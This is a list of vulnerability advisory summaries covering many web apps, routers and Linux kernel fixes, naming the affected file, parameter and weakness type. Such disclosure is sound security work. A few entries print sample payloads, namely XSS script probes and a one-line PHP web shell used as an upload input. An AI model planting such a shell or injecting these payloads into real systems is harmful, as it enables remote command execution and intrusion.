A vulnerability was found in EcShop 4.1.5. It has been classified as critical. This affects an unknown part of the file /ecshop/admin/template.php of the component PHP File Handler. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-220641 was assigned to this vulnerability.
A vulnerability has been found in SourceCodester Medical Certificate Generator App 1.0 and classified as critical. This vulnerability affects unknown code of the file action.php. The manipulation of the argument lastname leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-220558 is the identifier assigned to this vulnerability.
A vulnerability was found in glorylion JFinalOA 1.0.2 and classified as critical. This issue affects some unknown processing of the file src/main/java/com/pointlion/mvc/common/model/SysOrg.java. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-220469 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Medical Certificate Generator App 1.0. Affected by this issue is some unknown functionality of the file manage_record.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The identifier of this vulnerability is VDB-220340.
A vulnerability was found in SourceCodester Canteen Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file removeUser.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-220220.
A vulnerability, which was classified as critical, was found in Calendar Event Management System 2.3.0. This affects an unknown part. The manipulation of the argument start/end leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-220197 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in XXL-JOB 2.3.1. Affected by this issue is some unknown functionality of the file /user/updatePwd of the component New Password Handler. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-220196.
A vulnerability classified as critical was found in SourceCodester Online Eyewear Shop 1.0. Affected by this vulnerability is an unknown functionality of the file oews/?p=products/view_product.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The associated identifier of this vulnerability is VDB-220195.
A vulnerability was found in Calendar Event Management System 2.3.0. It has been rated as critical. This issue affects some unknown processing of the component Login Page. The manipulation of the argument name/pwd leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-220175.
A vulnerability was found in BDCOM 1704-WGL 2.0.6314. It has been classified as critical. This affects an unknown part of the file /param.file.tgz of the component Backup File Handler. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The identifier VDB-220101 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in Multilaser RE057 and RE170 2.1/2.2. This affects an unknown part of the file /param.file.tgz of the component Backup File Handler. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The identifier VDB-220053 was assigned to this vulnerability.
A vulnerability was found in FastCMS 0.1.0. It has been classified as critical. Affected is an unknown function of the component Template Management. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in YAFNET up to 3.1.11 and classified as problematic. This issue affects some unknown processing of the component Signature Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.1.12 is able to address this issue. The identifier of the patch is a1442a2bacc3335461b44c250e81f8d99c60735f. It is recommended to upgrade the affected component. The identifier VDB-220037 was assigned to this vulnerability.
A vulnerability has been found in dst-admin 1.5.0 and classified as critical. This vulnerability affects unknown code of the file /home/sendBroadcast. The manipulation of the argument message leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-220036.
A vulnerability, which was classified as critical, was found in dst-admin 1.5.0. This affects an unknown part of the file /home/masterConsole. The manipulation of the argument command leads to command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-220035.
A vulnerability, which was classified as critical, has been found in dst-admin 1.5.0. Affected by this issue is some unknown functionality of the file /home/kickPlayer. The manipulation of the argument userId leads to command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-220034 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in dst-admin 1.5.0. Affected by this vulnerability is an unknown functionality of the file /home/cavesConsole. The manipulation of the argument command leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-220033 was assigned to this vulnerability.
A vulnerability was found in PHPGurukul Employee Leaves Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file changepassword.php. The manipulation of the argument newpassword/confirmpassword leads to weak password requirements. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-220021 was assigned to this vulnerability.
A vulnerability was found in TRENDnet TEW-652BRP 3.04b01. It has been classified as critical. Affected is an unknown function of the file ping.ccp of the component Web Interface. The manipulation leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-220020.
A vulnerability was found in TRENDnet TEW-652BRP 3.04b01 and classified as problematic. This issue affects some unknown processing of the file get_set.ccp of the component Web Management Interface. The manipulation of the argument nextPage leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-220019.
A vulnerability has been found in TRENDnet TEW-811DRU 1.0.10.0 and classified as critical. This vulnerability affects unknown code of the component Web Interface. The manipulation leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-220018 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in TRENDnet TEW-811DRU 1.0.10.0. This affects an unknown part of the file wan.asp of the component Web Management Interface. The manipulation leads to memory corruption. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-220017 was assigned to this vulnerability.
A vulnerability was found in TRENDnet TEW-652BRP 3.04B01. It has been declared as critical. This vulnerability affects unknown code of the file cfg_op.ccp of the component Web Service. The manipulation leads to memory corruption. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-219958 is the identifier assigned to this vulnerability.
A vulnerability was found in TRENDNet TEW-811DRU 1.0.10.0. It has been classified as critical. This affects an unknown part of the file /wireless/guestnetwork.asp of the component httpd. The manipulation leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-219957 was assigned to this vulnerability.
A vulnerability has been found in TRENDnet TEW-811DRU 1.0.10.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /wireless/security.asp of the component httpd. The manipulation leads to memory corruption. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-219937 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in TRENDnet TEW-811DRU 1.0.10.0. Affected is an unknown function of the file /wireless/basic.asp of the component httpd. The manipulation leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-219936.
A vulnerability, which was classified as critical, has been found in TRENDnet TEW-652BRP 3.04B01. This issue affects some unknown processing of the file get_set.ccp of the component Web Management Interface. The manipulation leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-219935.
A vulnerability has been found in SourceCodester Canteen Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file createcustomer.php of the component Add Customer. The manipulation of the argument name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-219730 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Online Tours &amp; Travels Management System 1.0. This affects an unknown part of the file user\operations\payment_operation.php. The manipulation of the argument booking_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-219729 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in PHPGurukul Bank Locker Management System 1.0. This affects an unknown part of the file add-locker-form.php of the component Assign Locker. The manipulation of the argument ahname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-219717 was assigned to this vulnerability.
A vulnerability was found in PHPGurukul Bank Locker Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-219716.
A vulnerability, which was classified as critical, was found in SourceCodester Online Tours &amp; Travels Management System 1.0. Affected is an unknown function of the file /user/s.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-219702 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Online Tours &amp; Travels Management System 1.0. This issue affects some unknown processing of the file admin/practice_pdf.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-219701 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in YAFNET up to 3.1.10. This issue affects some unknown processing of the file /forum/PostPrivateMessage of the component Private Message Handler. The manipulation of the argument subject/message leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.1.11 is able to address this issue. The identifier of the patch is 2237a9d552e258a43570bb478a92a5505e7c8797. It is recommended to upgrade the affected component. The identifier VDB-219665 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Online Tours &amp; Travels Management System 1.0. This affects an unknown part of the file admin/expense_report.php. The manipulation of the argument to_date leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-219603.
A vulnerability, which was classified as critical, has been found in SourceCodester Online Tours &amp; Travels Management System 1.0. Affected by this issue is some unknown functionality of the file admin/expense_report.php. The manipulation of the argument from_date leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-219602 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Online Tours &amp; Travels Management System 1.0. Affected by this vulnerability is an unknown functionality of the file admin/disapprove_user.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-219601 was assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Online Tours &amp; Travels Management System 1.0. Affected is an unknown function of the file admin/booking_report.php. The manipulation of the argument to_date leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-219600.
A vulnerability was found in SourceCodester Online Tours &amp; Travels Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file admin/approve_user.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-219599.
A vulnerability was found in SourceCodester Online Tours &amp; Travels Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file admin/add_payment.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-219598 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Tours &amp; Travels Management System 1.0. It has been classified as critical. This affects an unknown part of the file admin/abc.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-219597 was assigned to this vulnerability.
A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php. The manipulation of the argument searchdata with the input "&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt; leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-219596.
A vulnerability was found in SourceCodester Online Tours &amp; Travels Management System 1.0. It has been classified as critical. Affected is an unknown function of the file user/forget_password.php of the component Parameter Handler. The manipulation of the argument email leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-219336.
A vulnerability was found in SourceCodester Online Tours &amp; Travels Management System 1.0 and classified as critical. This issue affects some unknown processing of the file admin/forget_password.php of the component Parameter Handler. The manipulation of the argument email leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-219335.
A vulnerability has been found in isoftforce Dreamer CMS up to 4.0.1 and classified as problematic. This vulnerability affects unknown code. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.3 is able to address this issue. It is recommended to upgrade the affected component. VDB-219334 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Food Ordering System 2.0. It has been classified as critical. Affected is an unknown function of the file admin/manage_user.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-218472.
A vulnerability was found in saemorris TheRadSystem. It has been classified as problematic. Affected is an unknown function of the file users.php. The manipulation of the argument q leads to cross site scripting. It is possible to launch the attack remotely. VDB-218454 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Tours &amp; Travels Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file admin/page-login.php. The manipulation of the argument email leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-218426 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Online Food Ordering System. This vulnerability affects unknown code of the file admin_class.php of the component Login Module. The manipulation of the argument username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-218386 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Online Food Ordering System. This affects an unknown part of the file admin_class.php of the component Signup Module. The manipulation of the argument email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-218385 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Food Ordering System. It has been rated as critical. Affected by this issue is some unknown functionality of the file view_prod.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-218384.
A vulnerability was found in ityouknow favorites-web. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Comment Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-218294 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Online Flight Booking Management System. This affects an unknown part of the file review_search.php of the component POST Parameter Handler. The manipulation of the argument txtsearch leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-218277 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Flight Booking Management System. It has been rated as critical. Affected by this issue is some unknown functionality of the file judge_panel.php. The manipulation of the argument subevent_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-218276.
A vulnerability was found in SourceCodester Online Food Ordering System 2.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Category List Handler. The manipulation of the argument Reason with the input "&gt;&lt;script&gt;prompt(1)&lt;/script&gt; leads to cross site scripting. The attack may be launched remotely. VDB-218186 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Food Ordering System 2.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /fos/admin/index.php?page=menu of the component Menu Form. The manipulation of the argument Image with the input &lt;?php system($_GET['c']); ?&gt; leads to unrestricted upload. The attack can be launched remotely. The identifier VDB-218185 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Food Ordering System 2.0. It has been classified as critical. Affected is an unknown function of the file /fos/admin/ajax.php?action=login of the component Login Page. The manipulation of the argument Username leads to sql injection. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-218184.
A vulnerability, which was classified as problematic, was found in earclink ESPCMS P8.21120101. Affected is an unknown function of the component Content Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-218154 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Online Flight Booking Management System. This issue affects some unknown processing of the file add_contestant.php. The manipulation of the argument add_contestant leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-218153 was assigned to this vulnerability.
A vulnerability was found in Control iD Gerencia Web 1.30. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the component Web Interface. The manipulation of the argument Nome leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-217717 was assigned to this vulnerability.
A vulnerability was found in Netis Netcore Router. It has been rated as problematic. Affected by this issue is some unknown functionality of the file param.file.tgz of the component Backup Handler. The manipulation leads to cleartext storage in a file or on disk. Local access is required to approach this attack. The identifier of this vulnerability is VDB-217592.
A vulnerability was found in Netis Netcore Router up to 2.2.6. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file param.file.tgz of the component Backup Handler. The manipulation leads to information disclosure. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-217591.
A vulnerability was found in Multilaser RE708 RE1200R4GC-2T2R-V3_v3411b_MUL029B. It has been rated as problematic. This issue affects some unknown processing of the component Telnet Service. The manipulation leads to denial of service. The attack may be initiated remotely. The identifier VDB-217169 was assigned to this vulnerability.
A vulnerability was found in sequentech admin-console up to 6.1.7 and classified as problematic. Affected by this issue is some unknown functionality of the component Election Description Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 7.0.0-beta.1 is able to address this issue. The patch is identified as 0043a6b1e6e0f5abc9557e73f9ffc524fc5d609d. It is recommended to upgrade the affected component. VDB-258782 is the identifier assigned to this vulnerability.
A vulnerability was found in Apollo 2.0.0/2.0.1 and classified as problematic. Affected by this issue is some unknown functionality of the file /users of the component Configuration Center. The manipulation leads to improper authorization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. VDB-250430 is the identifier assigned to this vulnerability. NOTE: The maintainer explains that user data information like user id, name, and email are not sensitive.
A vulnerability was found in Weitong Mall 1.0.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file platform-shop\src\main\resources\com\platform\dao\OrderDao.xml. The manipulation of the argument sidx/order leads to sql injection. The associated identifier of this vulnerability is VDB-250243.
A vulnerability, which was classified as problematic, has been found in cloudfavorites favorites-web 1.3.0. Affected by this issue is some unknown functionality of the component Nickname Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250238 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic was found in qkmc-rk redbbs 1.0. Affected by this vulnerability is an unknown functionality of the component Nickname Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250237 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in qkmc-rk redbbs 1.0. Affected is an unknown function of the component Post Handler. The manipulation of the argument title leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250236.
A vulnerability was found in librespeed speedtest up to 5.2.4. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file results/stats.php. The manipulation of the argument id leads to cross site scripting. The attack can be launched remotely. Upgrading to version 5.2.5 is able to address this issue. The patch is named a85f2c086f3449dffa8fe2edb5e2ef3ee72dc0e9. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-246643.
A vulnerability classified as critical has been found in Caphyon Advanced Installer 19.7. This affects an unknown part of the component WinSxS DLL Handler. The manipulation leads to uncontrolled search path. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. Upgrading to version 19.7.1 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-240903.
A vulnerability, which was classified as problematic, has been found in kalcaddle KodExplorer up to 4.49. Affected by this issue is some unknown functionality. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.50 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-227000.
A vulnerability classified as problematic was found in nuxsmin sysPass up to 3.2.4. Affected by this vulnerability is an unknown functionality of the component URL Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 3.2.5 is able to address this issue. The patch is named 4da4d031732ecca67519851fd0c34597dbb8ee55. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-222319.
A vulnerability was found in icplayer up to 0.818. It has been rated as problematic. Affected by this issue is some unknown functionality of the file addons/Commons/src/tts-utils.js. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 0.819 is able to address this issue. The patch is identified as fa785969f213c76384f1fe67d47b17d57fcc60c8. It is recommended to upgrade the affected component. VDB-222290 is the identifier assigned to this vulnerability.
A vulnerability was found in ualbertalib NEOSDiscovery 1.0.70 and classified as problematic. This issue affects some unknown processing of the file app/views/bookmarks/_refworks.html.erb. The manipulation leads to use of web link to untrusted target with window.opener access. The attack may be initiated remotely. Upgrading to version 1.0.71 is able to address this issue. The patch is named abe9f57123e0c278ae190cd7402a623d66c51375. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-222287.
A vulnerability was found in CodenameOne 7.0.70. It has been classified as problematic. Affected is an unknown function. The manipulation leads to use of implicit intent for sensitive communication. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. Upgrading to version 7.0.71 is able to address this issue. The patch is identified as dad49c9ef26a598619fc48d2697151a02987d478. It is recommended to upgrade the affected component. VDB-220470 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic has been found in eXo Chat Application. Affected is an unknown function of the file application/src/main/webapp/vue-app/components/ExoChatMessageComposer.vue of the component Mention Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 3.3.0-20220417 is able to address this issue. The name of the patch is 26bf307d3658d1403cfd5c3ad423ce4c4d1cb2dc. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-220212.
A vulnerability, which was classified as critical, has been found in abhilash1985 PredictApp. This issue affects some unknown processing of the file config/initializers/new_framework_defaults_7_0.rb of the component Cookie Handler. The manipulation leads to deserialization. The attack may be initiated remotely. The patch is named b067372f3ee26fe1b657121f0f41883ff4461a06. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218387.
In the Linux kernel, the following vulnerability has been resolved: iommu/arm-smmu: Don't unregister on shutdown Michael Walle says he noticed the following stack trace while performing a shutdown with "reboot -f". He suggests he got "lucky" and just hit the correct spot for the reboot while there was a packet transmission in flight. Unable to handle kernel NULL pointer dereference at virtual address 0000000000000098 CPU: 0 PID: 23 Comm: kworker/0:1 Not tainted 6.1.0-rc5-00088-gf3600ff8e322 #1930 Hardware name: Kontron KBox A-230-LS (DT) pc : iommu_get_dma_domain+0x14/0x20 lr : iommu_dma_map_page+0x9c/0x254 Call trace: iommu_get_dma_domain+0x14/0x20 dma_map_page_attrs+0x1ec/0x250 enetc_start_xmit+0x14c/0x10b0 enetc_xmit+0x60/0xdc dev_hard_start_xmit+0xb8/0x210 sch_direct_xmit+0x11c/0x420 __dev_queue_xmit+0x354/0xb20 ip6_finish_output2+0x280/0x5b0 __ip6_finish_output+0x15c/0x270 ip6_output+0x78/0x15c NF_HOOK.constprop.0+0x50/0xd0 mld_sendpack+0x1bc/0x320 mld_ifc_work+0x1d8/0x4dc process_one_work+0x1e8/0x460 worker_thread+0x178/0x534 kthread+0xe0/0xe4 ret_from_fork+0x10/0x20 Code: d503201f f9416800 d503233f d50323bf (f9404c00) ---[ end trace 0000000000000000 ]--- Kernel panic - not syncing: Oops: Fatal exception in interrupt This appears to be reproducible when the board has a fixed IP address, is ping flooded from another host, and "reboot -f" is used. The following is one more manifestation of the issue: $ reboot -f kvm: exiting hardware virtualization cfg80211: failed to load regulatory.db arm-smmu 5000000.iommu: disabling translation sdhci-esdhc 2140000.mmc: Removing from iommu group 11 sdhci-esdhc 2150000.mmc: Removing from iommu group 12 fsl-edma 22c0000.dma-controller: Removing from iommu group 17 dwc3 3100000.usb: Removing from iommu group 9 dwc3 3110000.usb: Removing from iommu group 10 ahci-qoriq 3200000.sata: Removing from iommu group 2 fsl-qdma 8380000.dma-controller: Removing from iommu group 20 platform f080000.display: Removing from iommu group 0 etnaviv-gpu f0c0000.gpu: Removing from iommu group 1 etnaviv etnaviv: Removing from iommu group 1 caam_jr 8010000.jr: Removing from iommu group 13 caam_jr 8020000.jr: Removing from iommu group 14 caam_jr 8030000.jr: Removing from iommu group 15 caam_jr 8040000.jr: Removing from iommu group 16 fsl_enetc 0000:00:00.0: Removing from iommu group 4 arm-smmu 5000000.iommu: Blocked unknown Stream ID 0x429; boot with "arm-smmu.disable_bypass=0" to allow, but this may have security implications arm-smmu 5000000.iommu: GFSR 0x80000002, GFSYNR0 0x00000002, GFSYNR1 0x00000429, GFSYNR2 0x00000000 fsl_enetc 0000:00:00.1: Removing from iommu group 5 arm-smmu 5000000.iommu: Blocked unknown Stream ID 0x429; boot with "arm-smmu.disable_bypass=0" to allow, but this may have security implications arm-smmu 5000000.iommu: GFSR 0x80000002, GFSYNR0 0x00000002, GFSYNR1 0x00000429, GFSYNR2 0x00000000 arm-smmu 5000000.iommu: Blocked unknown Stream ID 0x429; boot with "arm-smmu.disable_bypass=0" to allow, but this may have security implications arm-smmu 5000000.iommu: GFSR 0x80000002, GFSYNR0 0x00000000, GFSYNR1 0x00000429, GFSYNR2 0x00000000 fsl_enetc 0000:00:00.2: Removing from iommu group 6 fsl_enetc_mdio 0000:00:00.3: Removing from iommu group 8 mscc_felix 0000:00:00.5: Removing from iommu group 3 fsl_enetc 0000:00:00.6: Removing from iommu group 7 pcieport 0001:00:00.0: Removing from iommu group 18 arm-smmu 5000000.iommu: Blocked unknown Stream ID 0x429; boot with "arm-smmu.disable_bypass=0" to allow, but this may have security implications arm-smmu 5000000.iommu: GFSR 0x00000002, GFSYNR0 0x00000000, GFSYNR1 0x00000429, GFSYNR2 0x00000000 pcieport 0002:00:00.0: Removing from iommu group 19 Unable to handle kernel NULL pointer dereference at virtual address 00000000000000a8 pc : iommu_get_dma_domain+0x14/0x20 lr : iommu_dma_unmap_page+0x38/0xe0 Call trace: iommu_get_dma_domain+0x14/0x20 dma_unmap_page_attrs+0x38/0x1d0 en ---truncated---
A vulnerability has been found in sviehb jefferson up to 0.3 and classified as critical. This vulnerability affects unknown code of the file src/scripts/jefferson. The manipulation leads to path traversal. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. Upgrading to version 0.4 is able to address this issue. The name of the patch is 53b3f2fc34af0bb32afbcee29d18213e61471d87. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-218020.
In the Linux kernel, the following vulnerability has been resolved: ima: fix reference leak in asymmetric_verify() Don't leak a reference to the key if its algorithm is unknown.
In the Linux kernel, the following vulnerability has been resolved: scsi: myrs: Fix crash in error case In myrs_detect(), cs-&gt;disable_intr is NULL when privdata-&gt;hw_init() fails with non-zero. In this case, myrs_cleanup(cs) will call a NULL ptr and crash the kernel. [ 1.105606] myrs 0000:00:03.0: Unknown Initialization Error 5A [ 1.105872] myrs 0000:00:03.0: Failed to initialize Controller [ 1.106082] BUG: kernel NULL pointer dereference, address: 0000000000000000 [ 1.110774] Call Trace: [ 1.110950] myrs_cleanup+0xe4/0x150 [myrs] [ 1.111135] myrs_probe.cold+0x91/0x56a [myrs] [ 1.111302] ? DAC960_GEM_intr_handler+0x1f0/0x1f0 [myrs] [ 1.111500] local_pci_probe+0x48/0x90
A vulnerability was found in kaltura mwEmbed up to 2.91. It has been rated as problematic. Affected by this issue is some unknown functionality of the file modules/KalturaSupport/components/share/share.js of the component Share Plugin. The manipulation of the argument res leads to cross site scripting. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. Upgrading to version 2.92.rc1 is able to address this issue. The name of the patch is 4f11b6f6610acd6d89de5f8be47cf7c610643845. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-217664.
A vulnerability was found in CapsAdmin PAC3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file lua/pac3/core/shared/http.lua. The manipulation of the argument url leads to cross site scripting. The attack may be launched remotely. The patch is identified as 8fc9e12dfa21d757be6eb4194c763e848b299ac0. It is recommended to apply a patch to fix this issue. VDB-217646 is the identifier assigned to this vulnerability.
A vulnerability was found in Forged Alliance Forever up to 3746. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Vote Handler. The manipulation leads to improper authorization. Upgrading to version 3747 is able to address this issue. The patch is named 6880971bd3d73d942384aff62d53058c206ce644. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217555.
A vulnerability has been found in snoyberg keter up to 1.8.1 and classified as problematic. This vulnerability affects unknown code of the file Keter/Proxy.hs. The manipulation of the argument host leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.8.2 is able to address this issue. The name of the patch is d41f3697926b231782a3ad8050f5af1ce5cc40b7. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-217444.
A vulnerability was found in Kaltura mwEmbed up to 2.96.rc1 and classified as problematic. This issue affects some unknown processing of the file includes/DefaultSettings.php. The manipulation of the argument HTTP_X_FORWARDED_HOST leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 2.96.rc2 is able to address this issue. The patch is named 13b8812ebc8c9fa034eed91ab35ba8423a528c0b. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217427.
A vulnerability has been found in fossology and classified as problematic. This vulnerability affects unknown code. The manipulation of the argument sql/VarValue leads to cross site scripting. The attack can be initiated remotely. The patch is identified as 8e0eba001662c7eb35f045b70dd458a4643b4553. It is recommended to apply a patch to fix this issue. VDB-217426 is the identifier assigned to this vulnerability.
